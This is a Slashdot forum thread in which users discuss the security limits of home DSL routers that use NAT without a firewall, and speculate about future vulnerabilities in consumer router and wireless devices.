Slightly on-topic can anyone tell me what vulnerabilites exist if you are running a DSL router using NAT but no firewall ?

I have a small to fair amount of TCP/IP knowledge and at the moment my thinking is that you are only really vulnerable to DOS attacks.

I mean, if you aren't forwarding any ports then the only time there is a chink in your armour is when you have a temporary alias set up for a connection, which will be one port on one of the machines on your LAN. This alias won't last for long, and it will be on a port you're using for getting out, e.g. port 80,125... and you'd probably have to set your firewall up to allow this through if you ran a firewall.

Normally if a packet comes in to your sole external ip address and you haven't set up any port forwarding (or you have but it's not one of the ports you want to forward), the DSL router will just drop the packet.

Can anyone please clue me in on the vulnerabilities of using NAT alone and no firewall ?

graspee

could be the first in a line of problems (3, Insightful)

inepom01 (525367) | more than 11 years ago | (#4614854)

I think this is the first or one of the first times we hear of one of these small router/NAT devices having vulnerabilities. This one is not very serious as it will only crash the device rather than allow someone to gain access to the network, but both this and other devices may have holes that would allow hackers to gain access to home LANs.
This could be a serious problem in the coming future with these small routers/NATers being combined with wireless APs for everyone to use AIM from the couch. Great and all but people wiht these things are probably going to bother even less with security than they do now, thereby introducing a whole host of nastly little attacks.
This should be interesting to watch for.
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?